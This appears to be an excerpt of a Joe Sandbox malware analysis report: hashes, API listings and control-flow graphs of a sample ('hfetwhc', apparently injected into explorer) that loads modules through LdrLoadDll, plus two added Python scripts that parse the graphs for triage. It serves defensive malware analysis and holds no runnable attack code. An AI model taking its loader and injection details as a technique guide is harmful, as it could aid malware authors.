                                                                                                                                      • Instruction ID: 89f2914cc2dac389c0b12c02ff66fedede1797ae7b55e2ead308b6e2fcd35f0f
                                                                                                                                      • Opcode Fuzzy Hash: 2dee296a4d131c82c3840ae1576a0d1a0ddccac591fde9801053666fb7124599
                                                                                                                                      • Instruction Fuzzy Hash: 6C01D239633794ABCB21EB588CC4D7FBBA8EF81B10700885DFD5256100D72AAC2097A0
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memmove
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4104443479-0
                                                                                                                                      • Opcode ID: 3d6da900721ff391acd5c083a86e787545dccce05d95e6edb57348700f079d13
                                                                                                                                      • Instruction ID: be5b4b49b5b6224d7001fe55fd798e76c90c757cc05c1a6dd6d51cb46f77fafc
                                                                                                                                      • Opcode Fuzzy Hash: 3d6da900721ff391acd5c083a86e787545dccce05d95e6edb57348700f079d13
                                                                                                                                      • Instruction Fuzzy Hash: 76B14579611B808FC764CF6EC8C496AB7E5FF8A304B28892DE48ACB650D771F845CB54
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1559183368-0
                                                                                                                                      • Opcode ID: d4eb1a777f878832786e557e6d3bf7cead3d85c675fbd5e9f08223bff75cf05c
                                                                                                                                      • Instruction ID: 6e5d1fbc5b420d758d5f3ca2e41b77ff99ae86e23652c6394f929ed8b424e395
                                                                                                                                      • Opcode Fuzzy Hash: d4eb1a777f878832786e557e6d3bf7cead3d85c675fbd5e9f08223bff75cf05c
                                                                                                                                      • Instruction Fuzzy Hash: 4E51C534A02709EBDB64CFA9C8806AEB7F9AF50320F188F6DF875966D0D770D9508B54
                                                                                                                                      APIs
                                                                                                                                      • _malloc.LIBCMT ref: 030CAED9
                                                                                                                                        • Part of subcall function 030CAE3B: __FF_MSGBANNER.LIBCMT ref: 030CAE52
                                                                                                                                        • Part of subcall function 030CAE3B: __NMSG_WRITE.LIBCMT ref: 030CAE59
                                                                                                                                        • Part of subcall function 030CAE3B: RtlAllocateHeap.NTDLL(033D0000,00000000,00000001), ref: 030CAE7E
                                                                                                                                      • _free.LIBCMT ref: 030CAEEC
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateHeap_free_malloc
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1020059152-0
                                                                                                                                      • Opcode ID: 00c4cece77a466259ff7eacc0f13c0fe4d7aec4be041a57e95e48a661fde04d1
                                                                                                                                      • Instruction ID: ba2de7c126e4989046ed84d11cec5e369d93dd060b002c7628053eb4f828d7d5
                                                                                                                                      • Opcode Fuzzy Hash: 00c4cece77a466259ff7eacc0f13c0fe4d7aec4be041a57e95e48a661fde04d1
                                                                                                                                      • Instruction Fuzzy Hash: 6511E376A2739AEFCB60BBF8AC4479F77E8AF443A0B04456DED458E140DB38844182D0
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2782032738-0
                                                                                                                                      • Opcode ID: ea1406190fb9796f8190687ce42510bdf285d238db1f3e4e6202fb1ce1078a14
                                                                                                                                      • Instruction ID: 8b08dbaee0c2a09905ead50593554b526234c3832fe49502bf7e6fe955940440
                                                                                                                                      • Opcode Fuzzy Hash: ea1406190fb9796f8190687ce42510bdf285d238db1f3e4e6202fb1ce1078a14
                                                                                                                                      • Instruction Fuzzy Hash: 0541F8357027069FDB68CF68C8909AEB7EDAF84360B18897DEC55CBA84D770D9418B50
                                                                                                                                      APIs
                                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 030D17B2
                                                                                                                                      • __isleadbyte_l.LIBCMT ref: 030D17E0
                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,00000108,?,00000000,00000000), ref: 030D180E
                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,00000108,00000001,00000000,00000000), ref: 030D1844
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3058430110-0
                                                                                                                                      • Opcode ID: 95f756abe7d0225c7b99a6fb68a2a7fddbbdc1d6e32f598186423e19010bacdf
                                                                                                                                      • Instruction ID: 748a5899f439930b193d954b07a573a155cc449936c9eacffc4699345ff1b940
                                                                                                                                      • Opcode Fuzzy Hash: 95f756abe7d0225c7b99a6fb68a2a7fddbbdc1d6e32f598186423e19010bacdf
                                                                                                                                      • Instruction Fuzzy Hash: 0031A135A06346AFDBA9DF65D844BAFBBFAFF41310F194458E8148B1A0DB34D851CB90
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                      • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                      • Instruction ID: 832113f0283a254de7472c85e48e3cfc87f674a1d8cc89787979fe36e60de41c
                                                                                                                                      • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                      • Instruction Fuzzy Hash: E101483642118ABBCF12AF94DC418EE7F76BB58294F488429FA5858130D737C5B1EB81
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _malloc$_strlenstrncpy
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4159901624-0
                                                                                                                                      • Opcode ID: 1b0986be71260d84b4b40ec7ceea7b08610f6ec4acb85f2d008c600932a552e5
                                                                                                                                      • Instruction ID: 632a8a4c588ef403068808cb63e160cbdec236db9790c4fcf3a4912aaad2859f
                                                                                                                                      • Opcode Fuzzy Hash: 1b0986be71260d84b4b40ec7ceea7b08610f6ec4acb85f2d008c600932a552e5
                                                                                                                                      • Instruction Fuzzy Hash: 30E0D8B9B336627BC710BB6D5C44D9FA69CDFC92513458469FA09D7200C7244C1643F0
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DecodePointer__invoke_watson
                                                                                                                                      • String ID: PNEw
                                                                                                                                      • API String ID: 4034010525-3542233003
                                                                                                                                      • Opcode ID: 58d5912e386f2c5f32d82bc5a4281f116e48b69a240d7b1a458492be9a5aea7e
                                                                                                                                      • Instruction ID: c327e0bb4d30f21b4bfcc2b4303a611cff51bd805ec5017b6584ff9b0fd29f5f
                                                                                                                                      • Opcode Fuzzy Hash: 58d5912e386f2c5f32d82bc5a4281f116e48b69a240d7b1a458492be9a5aea7e
                                                                                                                                      • Instruction Fuzzy Hash: D5E0EC36412249BBCF416F61DC058AE3FA9FF44750B454414FE5088420D736C930DB95

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage: 1.2%
                                                                                                                                      Dynamic/Decrypted Code Coverage: 0%
                                                                                                                                      Signature Coverage: 0%
                                                                                                                                      Total number of Nodes: 19
                                                                                                                                      Total number of Limit Nodes: 1
                                                                                                                                      execution_graph 982 402919 983 40291d 982->983 984 4029e5 LdrLoadDll 983->984 985 4029f5 984->985 994 4029b9 995 4029da LdrLoadDll 994->995 997 4029f5 995->997 969 402d5a 973 402988 969->973 971 402d56 971->969 972 402d72 971->972 974 40298f 973->974 975 4029e5 LdrLoadDll 974->975 976 4029f5 975->976 976->971 977 40290a 979 4028ef 977->979 978 402952 979->977 979->978 980 4029e5 LdrLoadDll 979->980 981 4029f5 980->981
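The execution_graph line above is a flat token stream: a decimal node id, the node's hex address, an optional API label, and src->dst edges. The following added example, written for this report page and not part of Joe Sandbox or of the analysed sample, parses that stream (and the control_flow_graph variant further down, which uses address ranges and `call <target>` labels) and answers the triage question of which entry points in the hfetwhc dump can reach LdrLoadDll. The token layout is inferred from the lines on this page, the input is copied from the report, and all function names are my own.

```python
"""Parse Joe Sandbox's flat execution_graph / control_flow_graph text and
report which functions can reach a given API call.

Added example for this report page; not Joe Sandbox code. Token layout
(inferred from the page):
    <node-id> <hex-addr | start-end> [<api-name> | call <target>]* ... <src>-><dst>
"""
from collections import defaultdict

# Copied verbatim from the report's "Execution Graph" for hfetwhc (process 16).
EXECUTION_GRAPH = (
    "982 402919 983 40291d 982->983 984 4029e5 LdrLoadDll 983->984 985 4029f5 "
    "984->985 994 4029b9 995 4029da LdrLoadDll 994->995 997 4029f5 995->997 "
    "969 402d5a 973 402988 969->973 971 402d56 971->969 972 402d72 971->972 "
    "974 40298f 973->974 975 4029e5 LdrLoadDll 974->975 976 4029f5 975->976 "
    "976->971 977 40290a 979 4028ef 977->979 978 402952 979->977 979->978 "
    "980 4029e5 LdrLoadDll 979->980 981 4029f5 980->981"
)


def parse_graph(text):
    """Return (nodes, edges).

    nodes: {node_id: {"addr": int, "end": int | None, "calls": [str]}}
    edges: [(src_id, dst_id), ...]
    An all-digit token starts a node and the next token is unconditionally its
    address (so an all-digit address such as 402919 is never mistaken for an
    id).  Further non-numeric tokens up to the next node or edge are attached
    to the current node as labels; "call <target>" is kept as one label.
    """
    nodes, edges = {}, []
    tokens = text.split()
    i, cur = 0, None
    while i < len(tokens):
        tok = tokens[i]
        if "->" in tok:
            src, dst = tok.split("->", 1)
            edges.append((int(src), int(dst)))
            i += 1
        elif tok.isdigit():
            cur = int(tok)
            start, _, end = tokens[i + 1].partition("-")
            nodes[cur] = {"addr": int(start, 16),
                          "end": int(end, 16) if end else None,
                          "calls": []}
            i += 2
        elif tok == "call":
            nodes[cur]["calls"].append("call " + tokens[i + 1])
            i += 2
        else:
            nodes[cur]["calls"].append(tok)
            i += 1
    return nodes, edges


def call_sites(nodes, api):
    """Addresses of the graph nodes labelled with `api`, one entry per node."""
    return sorted(n["addr"] for n in nodes.values() if api in n["calls"])


def reaches_api(nodes, edges, api):
    """Ids of every node from which some path leads to a call of `api`
    (reverse BFS from the call sites; the call sites themselves are included)."""
    preds = defaultdict(list)
    for src, dst in edges:
        preds[dst].append(src)
    seen = {nid for nid, n in nodes.items() if api in n["calls"]}
    work = list(seen)
    while work:
        for p in preds[work.pop()]:
            if p not in seen:
                seen.add(p)
                work.append(p)
    return seen


def entry_points_reaching(nodes, edges, api):
    """Addresses of in-degree-0 nodes (function entries as the graph sees them)
    from which `api` is reachable.  A caller that only sits on a cycle has no
    in-degree-0 node and is therefore absent here; use reaches_api for those."""
    has_pred = {dst for _, dst in edges}
    return sorted(nodes[n]["addr"] for n in reaches_api(nodes, edges, api)
                  if n not in has_pred)


if __name__ == "__main__":
    nodes, edges = parse_graph(EXECUTION_GRAPH)
    print(f"{len(nodes)} nodes, {len(edges)} edges")
    for api in sorted({c for n in nodes.values() for c in n["calls"]}):
        sites = ", ".join(f"{a:x}" for a in call_sites(nodes, api))
        entries = ", ".join(f"{a:x}" for a in entry_points_reaching(nodes, edges, api))
        print(f"{api}: call sites [{sites}] reachable from entries [{entries}]")
```

Run stand-alone it lists the four LdrLoadDll nodes and the two in-degree-0 entries (402919 and 4029b9) that reach them. The callers at 40290a and 402d5a are on the cycles 979->977 and 976->971 and so have no in-degree-0 node, which is why `reaches_api` is exposed separately from `entry_points_reaching`.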

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 0 40290a-40290e 1 402910-402911 0->1 2 40298f-4029e1 call 401232 0->2 3 402913 1->3 4 40292c 1->4 25 4029e5-4029f3 LdrLoadDll 2->25 7 402914 3->7 8 40292e-402949 4->8 9 4028ef-4028f2 4->9 7->4 10 40294b-402950 8->10 12 4028f4-402906 9->12 13 40296d-40296e 9->13 10->7 17 402952-402954 10->17 14 402981-402985 12->14 15 402908 12->15 15->0 15->10 17->13 26 4029f5 25->26 27 4029fc-402a49 call 401232 25->27 26->27
                                                                                                                                      APIs
                                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004029EE
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000010.00000002.3927540281.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000010.00000002.3927368040.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                      • Associated: 00000010.00000002.3927694935.0000000000404000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_hfetwhc.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Load
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2234796835-0
                                                                                                                                      • Opcode ID: 94b9ecdda93e7a03f1b91e0d7552df6efdbadd54ccb0ddbcfaeec834152aa81f
                                                                                                                                      • Instruction ID: 0f37f1e8340a455a628f0dd2c8bfe38ab1bb1e89a3f0909cb6302f7b9a388a1b
                                                                                                                                      • Opcode Fuzzy Hash: 94b9ecdda93e7a03f1b91e0d7552df6efdbadd54ccb0ddbcfaeec834152aa81f
                                                                                                                                      • Instruction Fuzzy Hash: 8C3135B2708204DBC7229A74CB0C6657360FF61368F34817BE482BA0C1D5BD6647AF6B

Control-flow Graph
Basic blocks (id, address or address range, in-image call target, API called):
• 39 402919-40291b
• 40 402996-4029aa
• 41 40291d
• 44 4029b2-4029e1, call 401232
• 45 4029bb
• 42 402962
• 43 40291f-402925
• 52 4029e5-4029f3, LdrLoadDll
• 53 4029f5
• 54 4029fc-402a49, call 401232
Edges: 39->40 39->41 40->44 40->45 41->42 41->43 42->40 43->42 44->52 45->44 52->53 52->54 53->54
APIs
• LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004029EE
Memory Dump Source
• Source File: 00000010.00000002.3927540281.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.3927368040.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000010.00000002.3927694935.0000000000404000.00000080.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_hfetwhc.jbxd
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
• Opcode ID: 8076e47548ac09e5e7daeb9ea87f2321c4e851a486b438aa05f0ead927cd1cb5
• Instruction ID: 94162d520a03f6ebd08e1c1ad236a80b0b30f03ccf8e8ecf9357496de1815f78
• Opcode Fuzzy Hash: 8076e47548ac09e5e7daeb9ea87f2321c4e851a486b438aa05f0ead927cd1cb5
• Instruction Fuzzy Hash: 88113271708100E7CB209A548B4CBAA3320EB50320F2080B7E942BA1C1C9FC9A03BF6F

Control-flow Graph
Basic blocks (id, address or address range, in-image call target, API called):
• 66 402988-4029f3, call 401232, LdrLoadDll
• 80 4029f5
• 81 4029fc-402a49, call 401232
Edges: 66->80 66->81 80->81
APIs
• LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004029EE
Memory Dump Source
• Source File: 00000010.00000002.3927540281.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.3927368040.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000010.00000002.3927694935.0000000000404000.00000080.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_hfetwhc.jbxd
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
• Opcode ID: 1116fd35f8b690966260491feb7ff7e4415ced47bcc92838e410c90d1b3601aa
• Instruction ID: fa554d0c34519f5cd6b82b57aba43f03ca34593ce70611dbcf9765f41090c4dd
• Opcode Fuzzy Hash: 1116fd35f8b690966260491feb7ff7e4415ced47bcc92838e410c90d1b3601aa
• Instruction Fuzzy Hash: BA11EDB0708204E7D620AA449B4DB6A3324AB51714F308077B9837A1C1D9FC9A07BBAF

Control-flow Graph
Basic blocks (id, address or address range, in-image call target, API called):
• 93 402993-4029aa
• 94 4029b2-4029e1, call 401232
• 95 4029bb
• 102 4029e5-4029f3, LdrLoadDll
• 103 4029f5
• 104 4029fc-402a49, call 401232
Edges: 93->94 93->95 94->102 95->94 102->103 102->104 103->104
APIs
• LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004029EE
Memory Dump Source
• Source File: 00000010.00000002.3927540281.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.3927368040.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000010.00000002.3927694935.0000000000404000.00000080.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_hfetwhc.jbxd
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
• Opcode ID: c586a7f7552cfa1264bdfd6446e6af8fa62c48e7815e9ce7a11aec56ea3c76bc
• Instruction ID: 435834e2c39daa923cd5fadee32533bbbd7b41fdf8ed414aea64f9f221a811b8
• Opcode Fuzzy Hash: c586a7f7552cfa1264bdfd6446e6af8fa62c48e7815e9ce7a11aec56ea3c76bc
• Instruction Fuzzy Hash: 4B01AD71708100EBD7209A548B8DBA93720EB40714F2080B7E5467A1C2C9F8AA47BF6B

Control-flow Graph
Basic blocks (id, address or address range, in-image call target, API called):
• 116 4029ae-4029e1, call 401232
• 124 4029e5-4029f3, LdrLoadDll
• 125 4029f5
• 126 4029fc-402a49, call 401232
Edges: 116->124 124->125 124->126 125->126
APIs
• LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004029EE
Memory Dump Source
• Source File: 00000010.00000002.3927540281.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.3927368040.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000010.00000002.3927694935.0000000000404000.00000080.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_hfetwhc.jbxd
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
• Opcode ID: 5a071c98681e7d0b87df0d8d00c5fcc42721b749d79cd25973cd75420e8f5f16
• Instruction ID: 5d0c9aa573ddbf1b5d1aef5dd4ea0e86145ae8e07b52c401b3230758a671744f
• Opcode Fuzzy Hash: 5a071c98681e7d0b87df0d8d00c5fcc42721b749d79cd25973cd75420e8f5f16
• Instruction Fuzzy Hash: 85018471708104E7DB20AA849B49BAD7320AB40714F3080B7B5437A1C1D9FC9A57BF6F

Control-flow Graph
Basic blocks (id, address or address range, in-image call target, API called):
• 138 4029b9-4029e0
• 140 4029e5-4029f3, LdrLoadDll
• 141 4029f5
• 142 4029fc-402a49, call 401232
Edges: 138->140 140->141 140->142 141->142
APIs
• LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004029EE
Memory Dump Source
• Source File: 00000010.00000002.3927540281.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.3927368040.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000010.00000002.3927694935.0000000000404000.00000080.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_hfetwhc.jbxd
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
• Opcode ID: d8adf41a1b4864ea6d1a655086c93c2f4e0cb93a71ccb4490598b37b5feb4ad6
• Instruction ID: 680402693e7b9acc8b3619b38c705919dffa9aa4bf8e7b0a6659c80f6f187f6c
• Opcode Fuzzy Hash: d8adf41a1b4864ea6d1a655086c93c2f4e0cb93a71ccb4490598b37b5feb4ad6
• Instruction Fuzzy Hash: B8012831308244D7C721D6649A4DB6EBB60AF41714F2440EBD5837A0C2C9B89407FF5B
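The five control-flow graphs above all end in the same two blocks and all contain the LdrLoadDll call at 0x4029EE, which suggests they are overlapping entry points into one loader routine rather than five distinct functions (the first two arguments being 0 means LdrLoadDll is called with no search path and no flags, so the module name is carried entirely in the UNICODE_STRING third argument the sandbox left as "?"). The script below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses the flat token form in which the report exports each graph (the grammar in the docstring is inferred from those lines, an assumption), rebuilds blocks and edges, checks which reachable block covers the 0x4029EE call site, and computes the block ranges common to every entry. The graph strings are copied from this report; everything else is the example's own.

```python
"""Parse the text form of the per-function control-flow graphs that Joe Sandbox's
IDA plugin exports, and answer two questions about the LdrLoadDll routine above:
which reachable basic block contains the API call, and which blocks all the
overlapping entry points share.

Grammar of one exported graph (inferred from the report, flat and space-separated):
    control_flow_graph (<id> <start>[-<end>] ["call" <addr>] [<ApiName>] | <id>-><id>)*
with decimal block ids, hex addresses, and edges interleaved with block definitions.
"""
import re
from collections import deque
from dataclasses import dataclass, field

# Token strings copied from the report's control_flow_graph lines (process 16,
# image base 0x400000); the order matches the five functions listed above.
GRAPHS = [
    "control_flow_graph 39 402919-40291b 40 402996-4029aa 39->40 41 40291d 39->41 "
    "44 4029b2-4029e1 call 401232 40->44 45 4029bb 40->45 42 402962 41->42 "
    "43 40291f-402925 41->43 42->40 43->42 52 4029e5-4029f3 LdrLoadDll 44->52 "
    "45->44 53 4029f5 52->53 54 4029fc-402a49 call 401232 52->54 53->54",
    "control_flow_graph 66 402988-4029f3 call 401232 LdrLoadDll 80 4029f5 66->80 "
    "81 4029fc-402a49 call 401232 66->81 80->81",
    "control_flow_graph 93 402993-4029aa 94 4029b2-4029e1 call 401232 93->94 "
    "95 4029bb 93->95 102 4029e5-4029f3 LdrLoadDll 94->102 95->94 103 4029f5 "
    "102->103 104 4029fc-402a49 call 401232 102->104 103->104",
    "control_flow_graph 116 4029ae-4029e1 call 401232 124 4029e5-4029f3 LdrLoadDll "
    "116->124 125 4029f5 124->125 126 4029fc-402a49 call 401232 124->126 125->126",
    "control_flow_graph 138 4029b9-4029e0 140 4029e5-4029f3 LdrLoadDll 138->140 "
    "141 4029f5 140->141 142 4029fc-402a49 call 401232 140->142 141->142",
]

EDGE = re.compile(r"^(\d+)->(\d+)$")
BLOCK_ID = re.compile(r"^\d+$")
ADDR_RANGE = re.compile(r"^([0-9a-f]{4,8})(?:-([0-9a-f]{4,8}))?$")


@dataclass
class Block:
    bid: int
    start: int
    end: int
    calls: list = field(default_factory=list)  # in-image call targets
    apis: list = field(default_factory=list)   # resolved API names


def parse_cfg(text):
    """Return ({block id: Block} in definition order, [(src, dst), ...])."""
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks, edges, cur, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        e = EDGE.match(tok)
        if e:
            edges.append((int(e.group(1)), int(e.group(2))))
        elif (BLOCK_ID.match(tok) and i + 1 < len(tokens)
              and ADDR_RANGE.match(tokens[i + 1])):
            r = ADDR_RANGE.match(tokens[i + 1])
            start = int(r.group(1), 16)
            end = int(r.group(2), 16) if r.group(2) else start
            cur = blocks[int(tok)] = Block(int(tok), start, end)
            i += 1  # the address token was consumed with the id
        elif tok == "call":
            cur.calls.append(int(tokens[i + 1], 16))
            i += 1
        else:
            cur.apis.append(tok)  # a bare identifier after a block is an API name
        i += 1
    return blocks, edges


def reachable(blocks, edges, entry):
    """Block ids reachable from entry by following edges (BFS)."""
    succ = {}
    for src, dst in edges:
        succ.setdefault(src, []).append(dst)
    seen, todo = {entry}, deque([entry])
    while todo:
        for nxt in succ.get(todo.popleft(), []):
            if nxt not in seen:
                seen.add(nxt)
                todo.append(nxt)
    return seen


def entry_address(text):
    """Start address of the first block, which the plugin lists first."""
    blocks, _ = parse_cfg(text)
    return next(iter(blocks.values())).start


def api_sites(text):
    """{api name: [(start, end), ...]} for blocks reachable from the entry."""
    blocks, edges = parse_cfg(text)
    live = reachable(blocks, edges, next(iter(blocks)))
    sites = {}
    for b in blocks.values():
        if b.bid in live:
            for api in b.apis:
                sites.setdefault(api, []).append((b.start, b.end))
    return sites


def block_containing(text, addr):
    """The Block whose address range covers addr, or None."""
    blocks, _ = parse_cfg(text)
    return next((b for b in blocks.values() if b.start <= addr <= b.end), None)


def shared_ranges(graphs):
    """Address ranges present in every graph: the tail the entries converge on."""
    per_graph = [{(b.start, b.end) for b in parse_cfg(g)[0].values()} for g in graphs]
    return set.intersection(*per_graph)


if __name__ == "__main__":
    for g in GRAPHS:
        hit = block_containing(g, 0x4029EE)  # the report's 'ref: 004029EE' call site
        print(f"entry {entry_address(g):#x}: LdrLoadDll in block "
              f"{hit.start:#x}-{hit.end:#x}, reachable APIs {api_sites(g)}")
    print("blocks common to all entries:",
          sorted(f"{s:#x}-{e:#x}" for s, e in shared_ranges(GRAPHS)))
```

Run as a script it lists the five ascending entry addresses (0x402919 through 0x4029b9), shows that every entry reaches the LdrLoadDll block covering 0x4029EE, and reports the two ranges shared by all graphs, 0x4029f5 and 0x4029fc-0x402a49. The same parser applies unchanged to any other control_flow_graph line in the report, so it can be pointed at the other functions to find which ones reach a given API.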